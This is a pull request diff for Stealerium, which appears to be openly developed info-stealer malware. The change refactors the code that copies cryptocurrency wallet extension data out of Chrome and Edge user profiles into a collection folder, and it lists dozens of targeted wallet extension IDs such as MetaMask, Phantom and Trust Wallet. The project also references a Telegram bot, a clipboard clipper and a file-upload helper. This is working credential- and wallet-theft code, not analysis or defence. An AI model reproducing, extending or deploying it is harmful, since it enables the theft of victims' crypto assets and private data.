### PR TITLE
refactor: DRY up browser wallet extensions and fix build configurations

### DIFF
--- a/.github/workflows/build.yml
+++ b/.github/workflows/build.yml
@@ -68,7 +68,7 @@ jobs:
           GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
         with:
           tag_name: ${{ steps.extract_version.outputs.release_version }}
-          release_name: Release ${{ steps.extract_version.outputs.release_version }}
+          release_name: ${{ steps.extract_version.outputs.release_version }}
           body: ${{ steps.generate_release_notes.outputs.changelog }}
           draft: false
           prerelease: false

--- a/BuilderGUI/BuilderGUI.csproj
+++ b/BuilderGUI/BuilderGUI.csproj
@@ -7,26 +7,13 @@
     <ImplicitUsings>enable</ImplicitUsings>
     <UseWPF>true</UseWPF>
     <Platforms>AnyCPU;x64</Platforms>
-  </PropertyGroup>
-
-<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|AnyCPU'">
-    <OutputPath>..\Binaries\Debug\</OutputPath>
-    <GenerateSerializationAssemblies>Off</GenerateSerializationAssemblies>
+    <BaseOutputPath>..\Binaries\Release\</BaseOutputPath>
   </PropertyGroup>
 
 <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
   <OutputPath>..\Binaries\Debug\</OutputPath>
   <GenerateSerializationAssemblies>Off</GenerateSerializationAssemblies>
 </PropertyGroup>
-
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|AnyCPU'">
-    <OutputPath>..\Binaries\Release\</OutputPath>
-    <GenerateSerializationAssemblies>Off</GenerateSerializationAssemblies>
-	<AllowedReferenceRelatedFileExtensions>
-	    *.pdb;
-	    *.xml
-	</AllowedReferenceRelatedFileExtensions>
-  </PropertyGroup>
 
   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
     <OutputPath>..\Binaries\Release\</OutputPath>

--- a/Stub/Config.cs
+++ b/Stub/Config.cs
@@ -5,7 +5,7 @@ namespace Stealerium
 {
     public static class Config
     {
-        public static string Version = "v3.3.1";
+        public static string Version = "v3.4.0";
 
 #if DEBUG
         // Telegram bot API key

--- a/Stub/Stub.csproj
+++ b/Stub/Stub.csproj
@@ -32,30 +32,6 @@
     <NuGetPackageImportStamp>
     </NuGetPackageImportStamp>
   </PropertyGroup>
-  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
-    <PlatformTarget>AnyCPU</PlatformTarget>
-    <DebugSymbols>true</DebugSymbols>
-    <DebugType>full</DebugType>
-    <Optimize>false</Optimize>
-    <OutputPath>..\Binaries\Debug\net8.0-windows\Stub\</OutputPath>
-    <DefineConstants>TRACE;DEBUG</DefineConstants>
-    <ErrorReport>prompt</ErrorReport>
-    <WarningLevel>4</WarningLevel>
-  </PropertyGroup>
-  <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
-    <PlatformTarget>AnyCPU</PlatformTarget>
-    <DebugType>none</DebugType>
-    <Optimize>true</Optimize>
-    <OutputPath>..\Binaries\Release\net8.0-windows\Stub\</OutputPath>
-    <DefineConstants>RELEASE</DefineConstants>
-    <ErrorReport>prompt</ErrorReport>
-    <WarningLevel>4</WarningLevel>
-    <GenerateSerializationAssemblies>Off</GenerateSerializationAssemblies>
-    <AllowedReferenceRelatedFileExtensions>
-		  *.pdb;
-		  *.xml
-	  </AllowedReferenceRelatedFileExtensions>
-  </PropertyGroup>
   <PropertyGroup>
     <SignManifests>false</SignManifests>
   </PropertyGroup>
@@ -79,7 +55,7 @@
   </PropertyGroup>
   <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|x64'">
     <DebugSymbols>true</DebugSymbols>
-    <OutputPath>bin\x64\Debug\</OutputPath>
+    <OutputPath>..\Binaries\Debug\Stub\</OutputPath>
     <DefineConstants>TRACE;DEBUG</DefineConstants>
     <DebugType>full</DebugType>
     <PlatformTarget>x64</PlatformTarget>
@@ -88,7 +64,7 @@
     <Prefer32Bit>true</Prefer32Bit>
   </PropertyGroup>
   <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Release|x64'">
-    <OutputPath>bin\x64\Release\</OutputPath>
+    <OutputPath>..\Binaries\Release\net8.0-windows\Stub\</OutputPath>
     <DefineConstants>RELEASE</DefineConstants>
     <Optimize>true</Optimize>
     <PlatformTarget>x64</PlatformTarget>
@@ -120,6 +96,7 @@
     <Compile Include="Clipper\EventManager.cs" />
     <Compile Include="Clipper\Patterns.cs" />
     <Compile Include="Config.cs" />
+    <Compile Include="Target\Browsers\BrowserWalletExtensionsHelper.cs" />
     <Compile Include="Telegram.cs" />
     <Compile Include="Helpers\GofileFileService.cs" />
     <Compile Include="Helpers\ClipboardManager.cs" />

--- a/Stub/Target/Browsers/BrowserWalletExtensionsHelper.cs
+++ b/Stub/Target/Browsers/BrowserWalletExtensionsHelper.cs
@@ -1,0 +1,77 @@
+﻿using System;
+using System.Collections.Generic;
+using System.IO;
+using Stealerium.Helpers;
+
+namespace Stealerium.Target.Browsers
+{
+    internal static class BrowserWalletExtensionsHelper
+    {
+        /// <summary>
+        /// Retrieves wallets from specified directories and copies them to the save directory.
+        /// </summary>
+        /// <param name="saveDirectory">The directory where wallets will be saved.</param>
+        /// <param name="walletsDirectories">A dictionary mapping wallet names to their extension IDs.</param>
+        /// <param name="baseBrowserPath">The base path for the browser's extension settings.</param>
+        /// <param name="browserName">The name of the browser (e.g., "Edge", "Chrome").</param>
+        public static void GetWallets(string saveDirectory, Dictionary<string, string> walletsDirectories, string baseBrowserPath, string browserName)
+        {
+            try
+            {
+                int walletsCopied = 0;
+
+                // Iterate through each wallet directory and attempt to copy it
+                foreach (var wallet in walletsDirectories)
+                {
+                    string walletDirectory = Path.Combine(baseBrowserPath, wallet.Value);
+                    walletsCopied += CopyWalletFromDirectoryTo(saveDirectory, walletDirectory, wallet.Key) ? 1 : 0;
+                }
+
+                // If no wallets were copied, delete the save directory if it exists
+                if (walletsCopied == 0 && Directory.Exists(saveDirectory))
+                {
+                    Filemanager.RecursiveDelete(saveDirectory);
+                    Logging.Log($"No wallets found in {browserName} extensions.");
+                }
+            }
+            catch (Exception ex)
+            {
+                Logging.Log($"Error getting wallets for {browserName}: {ex.Message}");
+            }
+        }
+
+        /// <summary>
+        /// Copies wallet files from the source directory to the target directory.
+        /// </summary>
+        /// <param name="saveDirectory">The directory where wallets will be saved.</param>
+        /// <param name="walletDirectory">The source directory of the wallet extension.</param>
+        /// <param name="walletName">The name of the wallet.</param>
+        /// <returns>True if the copy was successful; otherwise, false.</returns>
+        private static bool CopyWalletFromDirectoryTo(string saveDirectory, string walletDirectory, string walletName)
+        {
+            try
+            {
+                if (!Directory.Exists(walletDirectory))
+                {
+                    return false;
+                }
+
+                // Create the save directory if it doesn't exist
+                Directory.CreateDirectory(saveDirectory);
+
+                var destinationDirectory = Path.Combine(saveDirectory, walletName);
+                Directory.CreateDirectory(destinationDirectory);
+                Filemanager.CopyDirectory(walletDirectory, destinationDirectory);
+
+                Counter.BrowserWallets++;
+                Logging.Log($"Copied wallet: {walletName} to {destinationDirectory}");
+                return true;
+            }
+            catch (Exception ex)
+            {
+                Logging.Log($"Error copying wallet {walletName}: {ex.Message}");
+                return false;
+            }
+        }
+    }
+}

--- a/Stub/Target/Browsers/Chromium/Extensions.cs
+++ b/Stub/Target/Browsers/Chromium/Extensions.cs
@@ -1,132 +1,82 @@
-using System;
 using System.Collections.Generic;
 using System.IO;
 using Stealerium.Helpers;
+using Stealerium.Target.Browsers;
 
 namespace Stealerium.Target.Browsers.Chromium
 {
     internal class Extensions
     {
-        // Dictionary for storing wallet names and corresponding Chrome extension paths
+        // Dictionary for storing wallet names and corresponding Chrome extension IDs
         private static readonly Dictionary<string, string> ChromeWalletsDirectories = new Dictionary<string, string>
         {
-            { "Chrome_Authenticator", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "bhghoamapcdpbohphigoooaddinpkbai") },
-            { "Chrome_Binance", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "fhbohimaelbohpjbbldcngcnapndodjp") },
-            { "Chrome_Bitapp", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "fihkakfobkmkjojpchpfgcmhfjnmnfpi") },
-            { "Chrome_BoltX", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "aodkkagnadcbobfpggfnjeongemjbjca") },
-            { "Chrome_Coin98", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "aeachknmefphepccionboohckonoeemg") },
-            { "Chrome_Coinbase", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "hnfanknocfeofbddgcijnmhnfnkdnaad") },
-            { "Chrome_Core", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "agoakfejjabomempkjlepdflaleeobhb") },
-            { "Chrome_Crocobit", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "pnlfjmlcjdjgkddecgincndfgegkecke") },
-            { "Chrome_Equal", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "blnieiiffboillknjnepogjhkgnoapac") },
-            { "Chrome_Ever", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "cgeeodpfagjceefieflmdfphplkenlfk") },
-            { "Chrome_ExodusWeb3", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "aholpfdialjgjfhomihkjbmgjidlcdno") },
-            { "Chrome_Fewcha", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "ebfidpplhabeedpnhjnobghokpiioolj") },
-            { "Chrome_Finnie", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "cjmkndjhnagcfbpiemnkdpomccnjblmj") },
-            { "Chrome_Guarda", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "hpglfhgfnhbgpjdenjgmdgoeiappafln") },
-            { "Chrome_Guild", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "nanjmdknhkinifnkgdcggcfnhdaammmj") },
-            { "Chrome_HarmonyOutdated", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "fnnegphlobjdpkhecapkijjdkgcjhkib") },
-            { "Chrome_Iconex", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "flpiciilemghbmfalicajoolhkkenfel") },
-            { "Chrome_JaxxLiberty", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "cjelfplplebdjjenllpjcblmjkfcffne") },
-            { "Chrome_Kaikas", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "jblndlipeogpafnldhgmapagcccfchpi") },
-            { "Chrome_KardiaChain", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "pdadjkfkgcafgbceimcpbkalnfnepbnk") },
-            { "Chrome_Keplr", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "dmkamcknogkgcdfhhbddcghachkejeap") },
-            { "Chrome_Liquality", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "kpfopkelmapcoipemfendmdcghnegimn") },
-            { "Chrome_MEWCX", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "nlbmnnijcnlegkjjpcfjclmcfggfefdm") },
-            { "Chrome_MaiarDEFI", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "dngmlblcodfobpdpecaadgfbcggfjfnm") },
-            { "Chrome_Martian", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "efbglgofoippbgcjepnhiblaibcnclgk") },
-            { "Chrome_Math", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "afbcbjpbpfadlkmhmclhkeeodmamcflc") },
-            { "Chrome_Metamask", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "nkbihfbeogaeaoehlefnkodbefgpgknn") },
-            { "Chrome_Metamask2", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "ejbalbakoplchlghecdalmeeeajnimhm") },
-            { "Chrome_Mobox", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "fcckkdbjnoikooededlapcalpionmalo") },
-            { "Chrome_Nami", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "lpfcbjknijpeeillifnkikgncikgfhdo") },
-            { "Chrome_Nifty", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "jbdaocneiiinmjbjlgalhcelgbejmnid") },
-            { "Chrome_Oxygen", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "fhilaheimglignddkjgofkcbgekhenbh") },
-            { "Chrome_PaliWallet", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "mgffkfbidihjpoaomajlbgchddlicgpn") },
-            { "Chrome_Petra", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "ejjladinnckdgjemekebdpeokbikhfci") },
-            { "Chrome_Phantom", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "bfnaelmomeimhlpmgjnjophhpkkoljpa") },
-            { "Chrome_Pontem", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "phkbamefinggmakgklpkljjmgibohnba") },
-            { "Chrome_Ronin", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "fnjhmkhhmkbjkkabndcnnogagogbneec") },
-            { "Chrome_Safepal", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "lgmpcpglpngdoalbgeoldeajfclnhafa") },
-            { "Chrome_Saturn", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "nkddgncdjgjfcddamfgcmfnlhccnimig") },
-            { "Chrome_Slope", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "pocmplpaccanhmnllbbkpgfliimjljgo") },
-            { "Chrome_Solfare", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "khacbfnclnjfjakompbldhceolaealdn") },
-            { "Chrome_Sollet", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "fhmfendgdocmcbmfikdcogofphimnkno") },
-            { "Chrome_Starcoin", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "mfhbebgoclkghebffdldpobeajmbecfk") },
-            { "Chrome_Swash", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "cmndjbecilbocjfkibfbifhngkdmjgog") },
-            { "Chrome_TempleTezos", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "ookjlbkiijinhpmnjffcofjonbfbgaoc") },
-            { "Chrome_TerraStation", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "aiifbnbfobpmeekipheeijimdpnlpgpp") },
-            { "Chrome_Tokenpocket", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "mfgccjchihfkkindfppnaooecgfneiii") },
-            { "Chrome_Ton", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "nphplpgoakhhjchkkhmiggakijnkhfnd") },
-            { "Chrome_Tonkeeper", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "ogaghekfbbibgpkeboogffmphcecpbga") },
-            { "Chrome_Tron", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "ibnejdfjmmkpcnlpebklmnkoeoihofec") },
-            { "Chrome_TrustWallet", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "egjidjbpglichdcondbcbdnbeeppgdph") },
-            { "Chrome_Wombat", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "amkmjjmmflddogmhpjloimipbofnfjih") },
-            { "Chrome_XDEFI", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "hmeobnfnfcmdkdcmlblgagmfpfboieaf") },
-            { "Chrome_XMR.PT", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "eigblbgjknlfbajkfhopmcojidlgcehm") },
-            { "Chrome_XinPay", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "bocpokimicclpaiekenaeelehdjllofo") },
-            { "Chrome_Yoroi", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "ffnbelfdoeiohenkjibnmadjiehjhajb") },
-            { "Chrome_iWallet", Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings", "kncchdigobghenbbaddojjnnaogfppfj") }
+            { "Chrome_Authenticator", "bhghoamapcdpbohphigoooaddinpkbai" },
+            { "Chrome_Binance", "fhbohimaelbohpjbbldcngcnapndodjp" },
+            { "Chrome_Bitapp", "fihkakfobkmkjojpchpfgcmhfjnmnfpi" },
+            { "Chrome_BoltX", "aodkkagnadcbobfpggfnjeongemjbjca" },
+            { "Chrome_Coin98", "aeachknmefphepccionboohckonoeemg" },
+            { "Chrome_Coinbase", "hnfanknocfeofbddgcijnmhnfnkdnaad" },
+            { "Chrome_Core", "agoakfejjabomempkjlepdflaleeobhb" },
+            { "Chrome_Crocobit", "pnlfjmlcjdjgkddecgincndfgegkecke" },
+            { "Chrome_Equal", "blnieiiffboillknjnepogjhkgnoapac" },
+            { "Chrome_Ever", "cgeeodpfagjceefieflmdfphplkenlfk" },
+            { "Chrome_ExodusWeb3", "aholpfdialjgjfhomihkjbmgjidlcdno" },
+            { "Chrome_Fewcha", "ebfidpplhabeedpnhjnobghokpiioolj" },
+            { "Chrome_Finnie", "cjmkndjhnagcfbpiemnkdpomccnjblmj" },
+            { "Chrome_Guarda", "hpglfhgfnhbgpjdenjgmdgoeiappafln" },
+            { "Chrome_Guild", "nanjmdknhkinifnkgdcggcfnhdaammmj" },
+            { "Chrome_HarmonyOutdated", "fnnegphlobjdpkhecapkijjdkgcjhkib" },
+            { "Chrome_Iconex", "flpiciilemghbmfalicajoolhkkenfel" },
+            { "Chrome_JaxxLiberty", "cjelfplplebdjjenllpjcblmjkfcffne" },
+            { "Chrome_Kaikas", "jblndlipeogpafnldhgmapagcccfchpi" },
+            { "Chrome_KardiaChain", "pdadjkfkgcafgbceimcpbkalnfnepbnk" },
+            { "Chrome_Keplr", "dmkamcknogkgcdfhhbddcghachkejeap" },
+            { "Chrome_Liquality", "kpfopkelmapcoipemfendmdcghnegimn" },
+            { "Chrome_MEWCX", "nlbmnnijcnlegkjjpcfjclmcfggfefdm" },
+            { "Chrome_MaiarDEFI", "dngmlblcodfobpdpecaadgfbcggfjfnm" },
+            { "Chrome_Martian", "efbglgofoippbgcjepnhiblaibcnclgk" },
+            { "Chrome_Math", "afbcbjpbpfadlkmhmclhkeeodmamcflc" },
+            { "Chrome_Metamask", "nkbihfbeogaeaoehlefnkodbefgpgknn" },
+            { "Chrome_Metamask2", "ejbalbakoplchlghecdalmeeeajnimhm" },
+            { "Chrome_Mobox", "fcckkdbjnoikooededlapcalpionmalo" },
+            { "Chrome_Nami", "lpfcbjknijpeeillifnkikgncikgfhdo" },
+            { "Chrome_Nifty", "jbdaocneiiinmjbjlgalhcelgbejmnid" },
+            { "Chrome_Oxygen", "fhilaheimglignddkjgofkcbgekhenbh" },
+            { "Chrome_PaliWallet", "mgffkfbidihjpoaomajlbgchddlicgpn" },
+            { "Chrome_Petra", "ejjladinnckdgjemekebdpeokbikhfci" },
+            { "Chrome_Phantom", "bfnaelmomeimhlpmgjnjophhpkkoljpa" },
+            { "Chrome_Pontem", "phkbamefinggmakgklpkljjmgibohnba" },
+            { "Chrome_Ronin", "fnjhmkhhmkbjkkabndcnnogagogbneec" },
+            { "Chrome_Safepal", "lgmpcpglpngdoalbgeoldeajfclnhafa" },
+            { "Chrome_Saturn", "nkddgncdjgjfcddamfgcmfnlhccnimig" },
+            { "Chrome_Slope", "pocmplpaccanhmnllbbkpgfliimjljgo" },
+            { "Chrome_Solfare", "khacbfnclnjfjakompbldhceolaealdn" },
+            { "Chrome_Sollet", "fhmfendgdocmcbmfikdcogofphimnkno" },
+            { "Chrome_Starcoin", "mfhbebgoclkghebffdldpobeajmbecfk" },
+            { "Chrome_Swash", "cmndjbecilbocjfkibfbifhngkdmjgog" },
+            { "Chrome_TempleTezos", "ookjlbkiijinhpmnjffcofjonbfbgaoc" },
+            { "Chrome_TerraStation", "aiifbnbfobpmeekipheeijimdpnlpgpp" },
+            { "Chrome_Tokenpocket", "mfgccjchihfkkindfppnaooecgfneiii" },
+            { "Chrome_Ton", "nphplpgoakhhjchkkhmiggakijnkhfnd" },
+            { "Chrome_Tonkeeper", "ogaghekfbbibgpkeboogffmphcecpbga" },
+            { "Chrome_Tron", "ibnejdfjmmkpcnlpebklmnkoeoihofec" },
+            { "Chrome_TrustWallet", "egjidjbpglichdcondbcbdnbeeppgdph" },
+            { "Chrome_Wombat", "amkmjjmmflddogmhpjloimipbofnfjih" },
+            { "Chrome_XDEFI", "hmeobnfnfcmdkdcmlblgagmfpfboieaf" },
+            { "Chrome_XMR.PT", "eigblbgjknlfbajkfhopmcojidlgcehm" },
+            { "Chrome_XinPay", "bocpokimicclpaiekenaeelehdjllofo" },
+            { "Chrome_Yoroi", "ffnbelfdoeiohenkjibnmadjiehjhajb" },
+            { "Chrome_iWallet", "kncchdigobghenbbaddojjnnaogfppfj" }
         };
 
-        // Main method to get Chrome wallets and save them to a directory
+        /// <summary>
+        /// Retrieves Chrome wallets and saves them to the specified directory.
+        /// </summary>
+        /// <param name="saveDirectory">The directory where wallets will be saved.</param>
         public static void GetChromeWallets(string saveDirectory)
         {
-            try
-            {
-                int walletsCopied = 0;
-
-                // Iterate through each wallet directory in the dictionary and attempt to copy it
-                foreach (var wallet in ChromeWalletsDirectories)
-                {
-                    walletsCopied += CopyWalletFromDirectoryTo(saveDirectory, wallet.Value, wallet.Key) ? 1 : 0;
-                }
-
-                // If no wallets were copied, delete the save directory
-                if (walletsCopied == 0)
-                {
-                    Logging.Log("No wallets found in Chrome extensions.");
-                    Filemanager.RecursiveDelete(saveDirectory);
-                }
-            }
-            catch (Exception)
-            {
-                //
-            }
-        }
-
-        // Helper method to copy wallet files from source directory to target directory
-        private static bool CopyWalletFromDirectoryTo(string saveDirectory, string walletDirectory, string walletName)
-        {
-            try
-            {
-                // Check if the wallet directory exists
-                if (!Directory.Exists(walletDirectory))
-                {
-                    return false;
-                }
-
-                // Create saveDirectory if it doesn't exist
-                if (!Directory.Exists(saveDirectory))
-                {
-                    Directory.CreateDirectory(saveDirectory);
-                }
-
-                // Create destination directory and copy files
-                var destinationDirectory = Path.Combine(saveDirectory, walletName);
-                Directory.CreateDirectory(destinationDirectory);
-                Filemanager.CopyDirectory(walletDirectory, destinationDirectory);
-
-                // Log success and increment the wallet counter
-                Logging.Log($"Copied wallet: {walletName} to {destinationDirectory}");
-                Counter.BrowserWallets++;
-                return true;
-            }
-            catch (Exception ex)
-            {
-                Logging.Log($"Error copying wallet {walletName}: {ex.Message}");
-                return false;
-            }
+            string baseBrowserPath = Path.Combine(Paths.Lappdata, "Google", "Chrome", "User Data", "Default", "Local Extension Settings");
+            BrowserWalletExtensionsHelper.GetWallets(saveDirectory, ChromeWalletsDirectories, baseBrowserPath, "Chrome");
         }
     }
 }

--- a/Stub/Target/Browsers/Edge/Extensions.cs
+++ b/Stub/Target/Browsers/Edge/Extensions.cs
@@ -1,129 +1,35 @@
-﻿using System;
-using System.Collections.Generic;
+﻿using System.Collections.Generic;
 using System.IO;
 using Stealerium.Helpers;
+using Stealerium.Target.Browsers;
 
 namespace Stealerium.Target.Browsers.Edge
 {
     internal class Extensions
     {
-        private static readonly List<string[]> EdgeWalletsDirectories = new List<string[]>
+        // Dictionary for storing wallet names and corresponding Edge extension IDs
+        private static readonly Dictionary<string, string> EdgeWalletsDirectories = new Dictionary<string, string>
         {
-            new[]
-            {
-                "Edge_Auvitas",
-                Paths.Lappdata +
-                "\\Microsoft\\Edge\\User Data\\Default\\Local Extension Settings\\klfhbdnlcfcaccoakhceodhldjojboga"
-            },
-            new[]
-            {
-                "Edge_Math",
-                Paths.Lappdata +
-                "\\Microsoft\\Edge\\User Data\\Default\\Local Extension Settings\\dfeccadlilpndjjohbjdblepmjeahlmm"
-            },
-            new[]
-            {
-                "Edge_Metamask",
-                Paths.Lappdata +
-                "\\Microsoft\\Edge\\User Data\\Default\\Local Extension Settings\\ejbalbakoplchlghecdalmeeeajnimhm"
-            },
-            new[]
-            {
-                "Edge_MTV",
-                Paths.Lappdata +
-                "\\Microsoft\\Edge\\User Data\\Default\\Local Extension Settings\\oooiblbdpdlecigodndinbpfopomaegl"
-            },
-            new[]
-            {
-                "Edge_Rabet",
-                Paths.Lappdata +
-                "\\Microsoft\\Edge\\User Data\\Default\\Local Extension Settings\\aanjhgiamnacdfnlfnmgehjikagdbafd"
-            },
-            new[]
-            {
-                "Edge_Ronin",
-                Paths.Lappdata +
-                "\\Microsoft\\Edge\\User Data\\Default\\Local Extension Settings\\bblmcdckkhkhfhhpfcchlpalebmonecp"
-            },
-            new[]
-            {
-                "Edge_Yoroi",
-                Paths.Lappdata +
-                "\\Microsoft\\Edge\\User Data\\Default\\Local Extension Settings\\akoiaibnepcedcplijmiamnaigbepmcb"
-            },
-            new[]
-            {
-                "Edge_Zilpay",
-                Paths.Lappdata +
-                "\\Microsoft\\Edge\\User Data\\Default\\Local Extension Settings\\fbekallmnjoeggkefjkbebpineneilec"
-            },
-            new[]
-            {
-                "Edge_Terra_Station",
-                Paths.Lappdata +
-                "\\Microsoft\\Edge\\User Data\\Default\\Local Extension Settings\\ajkhoeiiokighlmdnlakpjfoobnjinie"
-            },
-            new[]
-            {
-                "Edge_Jaxx",
-                Paths.Lappdata +
-                "\\Microsoft\\Edge\\User Data\\Default\\Local Extension Settings\\dmdimapfghaakeibppbfeokhgoikeoci"
-            }
+            { "Edge_Auvitas", "klfhbdnlcfcaccoakhceodhldjojboga" },
+            { "Edge_Math", "dfeccadlilpndjjohbjdblepmjeahlmm" },
+            { "Edge_Metamask", "ejbalbakoplchlghecdalmeeeajnimhm" },
+            { "Edge_MTV", "oooiblbdpdlecigodndinbpfopomaegl" },
+            { "Edge_Rabet", "aanjhgiamnacdfnlfnmgehjikagdbafd" },
+            { "Edge_Ronin", "bblmcdckkhkhfhhpfcchlpalebmonecp" },
+            { "Edge_Yoroi", "akoiaibnepcedcplijmiamnaigbepmcb" },
+            { "Edge_Zilpay", "fbekallmnjoeggkefjkbebpineneilec" },
+            { "Edge_Terra_Station", "ajkhoeiiokighlmdnlakpjfoobnjinie" },
+            { "Edge_Jaxx", "dmdimapfghaakeibppbfeokhgoikeoci" }
         };
 
-        public static void GetEdgeWallets(string sSaveDir)
+        /// <summary>
+        /// Retrieves Edge wallets and saves them to the specified directory.
+        /// </summary>
+        /// <param name="saveDirectory">The directory where wallets will be saved.</param>
+        public static void GetEdgeWallets(string saveDirectory)
         {
-            try
-            {
-                int walletsCopied = 0;
-
-                foreach (var array in EdgeWalletsDirectories)
-                {
-                    walletsCopied += CopyWalletFromDirectoryTo(sSaveDir, array[1], array[0]) ? 1 : 0;
-                }
-
-                // If no wallets were copied, delete the save directory if it exists
-                if (walletsCopied == 0)
-                {
-                    Filemanager.RecursiveDelete(sSaveDir);
-                    Logging.Log("No wallets found in Edge extensions.");
-                }
-            }
-            catch (Exception)
-            {
-                //
-            }
-        }
-
-        // Copy wallet files to directory
-        private static bool CopyWalletFromDirectoryTo(string saveDirectory, string walletDirectory, string walletName)
-        {
-            try
-            {
-                if (!Directory.Exists(walletDirectory))
-                {
-                    return false;
-                }
-
-                // Create saveDirectory if it doesn't exist
-                if (!Directory.Exists(saveDirectory))
-                {
-                    Directory.CreateDirectory(saveDirectory);
-                }
-
-                var destinationDirectory = Path.Combine(saveDirectory, walletName);
-                Directory.CreateDirectory(destinationDirectory);
-                Filemanager.CopyDirectory(walletDirectory, destinationDirectory);
-                Counter.BrowserWallets++;
-
-                Logging.Log($"Copied wallet: {walletName} to {destinationDirectory}");
-                return true;
-            }
-            catch (Exception ex)
-            {
-                Logging.Log($"Error copying wallet {walletName}: {ex.Message}");
-                return false;
-            }
+            string baseBrowserPath = Path.Combine(Paths.Lappdata, "Microsoft", "Edge", "User Data", "Default", "Local Extension Settings");
+            BrowserWalletExtensionsHelper.GetWallets(saveDirectory, EdgeWalletsDirectories, baseBrowserPath, "Edge");
         }
     }
 }


### PR DESCRIPTION
- Extract shared logic into `BrowserWalletExtensionsHelper` to eliminate duplication
- Update Edge and Chromium extensions to use the shared helper class
